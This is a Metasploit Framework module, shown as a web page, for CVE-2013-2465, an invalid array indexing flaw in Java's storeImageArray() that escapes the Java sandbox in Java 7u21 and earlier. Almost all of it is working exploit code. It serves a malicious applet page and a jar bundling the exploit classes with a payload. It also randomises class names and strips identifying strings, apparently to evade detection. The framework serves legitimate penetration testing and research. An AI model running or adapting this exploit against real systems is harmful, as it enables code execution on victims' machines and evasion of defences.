Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_storeimagearray.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
11
# include Msf::Exploit::Remote::BrowserAutopwn
12
# autopwn_info({ :javascript => false })
13
14
def initialize(info = {})
15
super(
16
update_info(
17
info,
18
'Name' => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
19
'Description' => %q{
20
This module abuses an Invalid Array Indexing Vulnerability on the
21
static function storeImageArray() function in order to cause a
22
memory corruption and escape the Java Sandbox. The vulnerability
23
affects Java version 7u21 and earlier. The module, which doesn't bypass
24
click2play, has been tested successfully on Java 7u21 on Windows and
25
Linux systems.
26
},
27
'License' => MSF_LICENSE,
28
'Author' => [
29
'Unknown', # From PacketStorm
30
'sinn3r', # Metasploit
31
'juan vazquez' # Metasploit
32
],
33
'References' => [
34
[ 'CVE', '2013-2465' ],
35
[ 'OSVDB', '96269' ],
36
[ 'EDB', '27526' ],
37
[ 'PACKETSTORM', '122777' ],
38
[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
39
],
40
'Platform' => %w{java linux win},
41
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
42
'Targets' => [
43
[
44
'Generic (Java Payload)',
45
{
46
'Arch' => ARCH_JAVA,
47
'Platform' => 'java'
48
}
49
],
50
[
51
'Windows Universal',
52
{
53
'Arch' => ARCH_X86,
54
'Platform' => 'win'
55
}
56
],
57
[
58
'Linux x86',
59
{
60
'Arch' => ARCH_X86,
61
'Platform' => 'linux'
62
}
63
]
64
],
65
'DefaultTarget' => 0,
66
'DisclosureDate' => '2013-08-12',
67
'Notes' => {
68
'Reliability' => UNKNOWN_RELIABILITY,
69
'Stability' => UNKNOWN_STABILITY,
70
'SideEffects' => UNKNOWN_SIDE_EFFECTS
71
}
72
)
73
)
74
end
75
76
def setup
77
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit.class")
78
@exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
79
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")
80
@color_model_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
81
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")
82
@color_space_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
83
84
@exploit_class_name = rand_text_alpha("Exploit".length)
85
@color_model_class_name = rand_text_alpha("MyColorModel".length)
86
@color_space_class_name = rand_text_alpha("MyColorSpace".length)
87
88
@exploit_class.gsub!("Exploit", @exploit_class_name)
89
@exploit_class.gsub!("MyColorModel", @color_model_class_name)
90
@exploit_class.gsub!("MyColorSpace", @color_space_class_name)
91
92
@color_model_class.gsub!("Exploit", @exploit_class_name)
93
@color_model_class.gsub!("MyColorModel", @color_model_class_name)
94
@color_model_class.gsub!("MyColorSpace", @color_space_class_name)
95
96
@color_space_class.gsub!("Exploit", @exploit_class_name)
97
@color_space_class.gsub!("MyColorModel", @color_model_class_name)
98
@color_space_class.gsub!("MyColorSpace", @color_space_class_name)
99
100
super
101
end
102
103
def on_request_uri(cli, request)
104
vprint_status("Requesting: #{request.uri}")
105
if request.uri !~ /\.jar$/i
106
if not request.uri =~ /\/$/
107
vprint_status("Sending redirect...")
108
send_redirect(cli, "#{get_resource}/", '')
109
return
110
end
111
112
print_status("Sending HTML...")
113
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
114
return
115
end
116
117
print_status("Sending .jar file...")
118
send_response(cli, generate_jar(cli), { 'Content-Type' => 'application/java-archive' })
119
120
handler(cli)
121
end
122
123
def generate_html
124
jar_name = rand_text_alpha(5 + rand(3))
125
html = %Q|<html>
126
<head>
127
</head>
128
<body>
129
<applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">
130
</applet>
131
</body>
132
</html>
133
|
134
html = html.gsub(/^ {4}/, '')
135
return html
136
end
137
138
def generate_jar(cli)
139
p = regenerate_payload(cli)
140
jar = p.encoded_jar
141
142
jar.add_file("#{@exploit_class_name}.class", @exploit_class)
143
jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
144
jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)
145
metasploit_str = rand_text_alpha("metasploit".length)
146
payload_str = rand_text_alpha("payload".length)
147
jar.entries.each { |entry|
148
entry.name.gsub!("metasploit", metasploit_str)
149
entry.name.gsub!("Payload", payload_str)
150
entry.data = entry.data.gsub("metasploit", metasploit_str)
151
entry.data = entry.data.gsub("Payload", payload_str)
152
}
153
jar.build_manifest
154
155
return jar.pack
156
end
157
end
158
159